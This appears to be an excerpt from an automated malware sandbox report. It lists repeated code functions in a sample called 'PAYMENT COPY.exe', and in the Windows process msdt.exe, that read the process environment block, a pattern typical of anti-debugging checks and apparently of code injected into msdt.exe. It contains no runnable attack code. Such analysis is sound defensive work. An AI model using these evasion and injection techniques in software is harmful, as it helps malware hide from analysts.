          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADE620 mov eax, dword ptr fs:[00000030h]2_2_00ADE620
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A61C mov eax, dword ptr fs:[00000030h]2_2_00B0A61C
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A61C mov eax, dword ptr fs:[00000030h]2_2_00B0A61C
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]2_2_00ADC600
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]2_2_00ADC600
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]2_2_00ADC600
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B08E00 mov eax, dword ptr fs:[00000030h]2_2_00B08E00
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91608 mov eax, dword ptr fs:[00000030h]2_2_00B91608
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE766D mov eax, dword ptr fs:[00000030h]2_2_00AE766D
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]2_2_00AFAE73
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]2_2_00AFAE73
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]2_2_00AFAE73
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]2_2_00AFAE73
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]2_2_00AFAE73
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]2_2_00AE7E41
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]2_2_00AE7E41
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]2_2_00AE7E41
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]2_2_00AE7E41
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]2_2_00AE7E41
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]2_2_00AE7E41
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9AE44 mov eax, dword ptr fs:[00000030h]2_2_00B9AE44
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9AE44 mov eax, dword ptr fs:[00000030h]2_2_00B9AE44
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]2_2_00B57794
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]2_2_00B57794
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]2_2_00B57794
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE8794 mov eax, dword ptr fs:[00000030h]2_2_00AE8794
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B137F5 mov eax, dword ptr fs:[00000030h]2_2_00B137F5
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0E730 mov eax, dword ptr fs:[00000030h]2_2_00B0E730
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD4F2E mov eax, dword ptr fs:[00000030h]2_2_00AD4F2E
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD4F2E mov eax, dword ptr fs:[00000030h]2_2_00AD4F2E
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6FF10 mov eax, dword ptr fs:[00000030h]2_2_00B6FF10
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6FF10 mov eax, dword ptr fs:[00000030h]2_2_00B6FF10
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA070D mov eax, dword ptr fs:[00000030h]2_2_00BA070D
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA070D mov eax, dword ptr fs:[00000030h]2_2_00BA070D
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFF716 mov eax, dword ptr fs:[00000030h]2_2_00AFF716
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A70E mov eax, dword ptr fs:[00000030h]2_2_00B0A70E
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A70E mov eax, dword ptr fs:[00000030h]2_2_00B0A70E
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEFF60 mov eax, dword ptr fs:[00000030h]2_2_00AEFF60
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8F6A mov eax, dword ptr fs:[00000030h]2_2_00BA8F6A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEEF40 mov eax, dword ptr fs:[00000030h]2_2_00AEEF40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA8CD6 mov eax, dword ptr fs:[00000030h]5_2_04DA8CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D914FB mov eax, dword ptr fs:[00000030h]5_2_04D914FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56CF0 mov eax, dword ptr fs:[00000030h]5_2_04D56CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56CF0 mov eax, dword ptr fs:[00000030h]5_2_04D56CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56CF0 mov eax, dword ptr fs:[00000030h]5_2_04D56CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE849B mov eax, dword ptr fs:[00000030h]5_2_04CE849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6C450 mov eax, dword ptr fs:[00000030h]5_2_04D6C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6C450 mov eax, dword ptr fs:[00000030h]5_2_04D6C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A44B mov eax, dword ptr fs:[00000030h]5_2_04D0A44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF746D mov eax, dword ptr fs:[00000030h]5_2_04CF746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA740D mov eax, dword ptr fs:[00000030h]5_2_04DA740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA740D mov eax, dword ptr fs:[00000030h]5_2_04DA740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA740D mov eax, dword ptr fs:[00000030h]5_2_04DA740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]5_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]5_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]5_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]5_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]5_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]5_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]5_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]5_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]5_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]5_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]5_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]5_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]5_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]5_2_04D91C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56C0A mov eax, dword ptr fs:[00000030h]5_2_04D56C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56C0A mov eax, dword ptr fs:[00000030h]5_2_04D56C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56C0A mov eax, dword ptr fs:[00000030h]5_2_04D56C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56C0A mov eax, dword ptr fs:[00000030h]5_2_04D56C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0BC2C mov eax, dword ptr fs:[00000030h]5_2_04D0BC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]5_2_04D56DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]5_2_04D56DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]5_2_04D56DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov ecx, dword ptr fs:[00000030h]5_2_04D56DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]5_2_04D56DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]5_2_04D56DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D88DF1 mov eax, dword ptr fs:[00000030h]5_2_04D88DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CED5E0 mov eax, dword ptr fs:[00000030h]5_2_04CED5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CED5E0 mov eax, dword ptr fs:[00000030h]5_2_04CED5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]5_2_04D9FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]5_2_04D9FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]5_2_04D9FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]5_2_04D9FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]5_2_04CD2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]5_2_04CD2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]5_2_04CD2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]5_2_04CD2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]5_2_04CD2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0FD9B mov eax, dword ptr fs:[00000030h]5_2_04D0FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0FD9B mov eax, dword ptr fs:[00000030h]5_2_04D0FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02581 mov eax, dword ptr fs:[00000030h]5_2_04D02581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02581 mov eax, dword ptr fs:[00000030h]5_2_04D02581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02581 mov eax, dword ptr fs:[00000030h]5_2_04D02581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02581 mov eax, dword ptr fs:[00000030h]5_2_04D02581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D01DB5 mov eax, dword ptr fs:[00000030h]5_2_04D01DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D01DB5 mov eax, dword ptr fs:[00000030h]5_2_04D01DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D01DB5 mov eax, dword ptr fs:[00000030h]5_2_04D01DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D035A1 mov eax, dword ptr fs:[00000030h]5_2_04D035A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA05AC mov eax, dword ptr fs:[00000030h]5_2_04DA05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA05AC mov eax, dword ptr fs:[00000030h]5_2_04DA05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D13D43 mov eax, dword ptr fs:[00000030h]5_2_04D13D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D53540 mov eax, dword ptr fs:[00000030h]5_2_04D53540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D83D40 mov eax, dword ptr fs:[00000030h]5_2_04D83D40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF7D50 mov eax, dword ptr fs:[00000030h]5_2_04CF7D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFC577 mov eax, dword ptr fs:[00000030h]5_2_04CFC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFC577 mov eax, dword ptr fs:[00000030h]5_2_04CFC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9E539 mov eax, dword ptr fs:[00000030h]5_2_04D9E539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D5A537 mov eax, dword ptr fs:[00000030h]5_2_04D5A537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D04D3B mov eax, dword ptr fs:[00000030h]5_2_04D04D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D04D3B mov eax, dword ptr fs:[00000030h]5_2_04D04D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D04D3B mov eax, dword ptr fs:[00000030h]5_2_04D04D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA8D34 mov eax, dword ptr fs:[00000030h]5_2_04DA8D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]5_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]5_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]5_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]5_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]5_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]5_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]5_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]5_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]5_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]5_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]5_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]5_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]5_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDAD30 mov eax, dword ptr fs:[00000030h]5_2_04CDAD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA8ED6 mov eax, dword ptr fs:[00000030h]5_2_04DA8ED6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D18EC7 mov eax, dword ptr fs:[00000030h]5_2_04D18EC7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D8FEC0 mov eax, dword ptr fs:[00000030h]5_2_04D8FEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D036CC mov eax, dword ptr fs:[00000030h]5_2_04D036CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE76E2 mov eax, dword ptr fs:[00000030h]5_2_04CE76E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D016E0 mov ecx, dword ptr fs:[00000030h]5_2_04D016E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6FE87 mov eax, dword ptr fs:[00000030h]5_2_04D6FE87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D546A7 mov eax, dword ptr fs:[00000030h]5_2_04D546A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]5_2_04DA0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]5_2_04DA0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]5_2_04DA0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]5_2_04CE7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]5_2_04CE7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]5_2_04CE7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]5_2_04CE7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]5_2_04CE7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]5_2_04CE7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9AE44 mov eax, dword ptr fs:[00000030h]5_2_04D9AE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9AE44 mov eax, dword ptr fs:[00000030h]5_2_04D9AE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE766D mov eax, dword ptr fs:[00000030h]5_2_04CE766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]5_2_04CFAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]5_2_04CFAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]5_2_04CFAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]5_2_04CFAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]5_2_04CFAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A61C mov eax, dword ptr fs:[00000030h]5_2_04D0A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A61C mov eax, dword ptr fs:[00000030h]5_2_04D0A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDC600 mov eax, dword ptr fs:[00000030h]5_2_04CDC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDC600 mov eax, dword ptr fs:[00000030h]5_2_04CDC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDC600 mov eax, dword ptr fs:[00000030h]5_2_04CDC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D08E00 mov eax, dword ptr fs:[00000030h]5_2_04D08E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91608 mov eax, dword ptr fs:[00000030h]5_2_04D91608
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D8FE3F mov eax, dword ptr fs:[00000030h]5_2_04D8FE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDE620 mov eax, dword ptr fs:[00000030h]5_2_04CDE620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D137F5 mov eax, dword ptr fs:[00000030h]5_2_04D137F5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57794 mov eax, dword ptr fs:[00000030h]5_2_04D57794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57794 mov eax, dword ptr fs:[00000030h]5_2_04D57794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57794 mov eax, dword ptr fs:[00000030h]5_2_04D57794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE8794 mov eax, dword ptr fs:[00000030h]5_2_04CE8794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEEF40 mov eax, dword ptr fs:[00000030h]5_2_04CEEF40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEFF60 mov eax, dword ptr fs:[00000030h]5_2_04CEFF60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA8F6A mov eax, dword ptr fs:[00000030h]5_2_04DA8F6A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6FF10 mov eax, dword ptr fs:[00000030h]5_2_04D6FF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6FF10 mov eax, dword ptr fs:[00000030h]5_2_04D6FF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA070D mov eax, dword ptr fs:[00000030h]5_2_04DA070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA070D mov eax, dword ptr fs:[00000030h]5_2_04DA070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFF716 mov eax, dword ptr fs:[00000030h]5_2_04CFF716
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A70E mov eax, dword ptr fs:[00000030h]5_2_04D0A70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A70E mov eax, dword ptr fs:[00000030h]5_2_04D0A70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0E730 mov eax, dword ptr fs:[00000030h]5_2_04D0E730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD4F2E mov eax, dword ptr fs:[00000030h]5_2_04CD4F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD4F2E mov eax, dword ptr fs:[00000030h]5_2_04CD4F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]5_2_04D6B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6B8D0 mov ecx, dword ptr fs:[00000030h]5_2_04D6B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]5_2_04D6B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]5_2_04D6B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]5_2_04D6B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]5_2_04D6B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD58EC mov eax, dword ptr fs:[00000030h]5_2_04CD58EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD40E1 mov eax, dword ptr fs:[00000030h]5_2_04CD40E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD40E1 mov eax, dword ptr fs:[00000030h]5_2_04CD40E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD40E1 mov eax, dword ptr fs:[00000030h]5_2_04CD40E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9080 mov eax, dword ptr fs:[00000030h]5_2_04CD9080
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D53884 mov eax, dword ptr fs:[00000030h]5_2_04D53884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D53884 mov eax, dword ptr fs:[00000030h]5_2_04D53884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0F0BF mov ecx, dword ptr fs:[00000030h]5_2_04D0F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0F0BF mov eax, dword ptr fs:[00000030h]5_2_04D0F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0F0BF mov eax, dword ptr fs:[00000030h]5_2_04D0F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A0 mov eax, dword ptr fs:[00000030h]5_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A0 mov eax, dword ptr fs:[00000030h]5_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A0 mov eax, dword ptr fs:[00000030h]5_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A0 mov eax, dword ptr fs:[00000030h]5_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A0 mov eax, dword ptr fs:[00000030h]5_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A0 mov eax, dword ptr fs:[00000030h]5_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D190AF mov eax, dword ptr fs:[00000030h]5_2_04D190AF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF0050 mov eax, dword ptr fs:[00000030h]5_2_04CF0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF0050 mov eax, dword ptr fs:[00000030h]5_2_04CF0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D92073 mov eax, dword ptr fs:[00000030h]5_2_04D92073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA1074 mov eax, dword ptr fs:[00000030h]5_2_04DA1074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57016 mov eax, dword ptr fs:[00000030h]5_2_04D57016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57016 mov eax, dword ptr fs:[00000030h]5_2_04D57016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57016 mov eax, dword ptr fs:[00000030h]5_2_04D57016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA4015 mov eax, dword ptr fs:[00000030h]5_2_04DA4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA4015 mov eax, dword ptr fs:[00000030h]5_2_04DA4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEB02A mov eax, dword ptr fs:[00000030h]5_2_04CEB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEB02A mov eax, dword ptr fs:[00000030h]5_2_04CEB02A
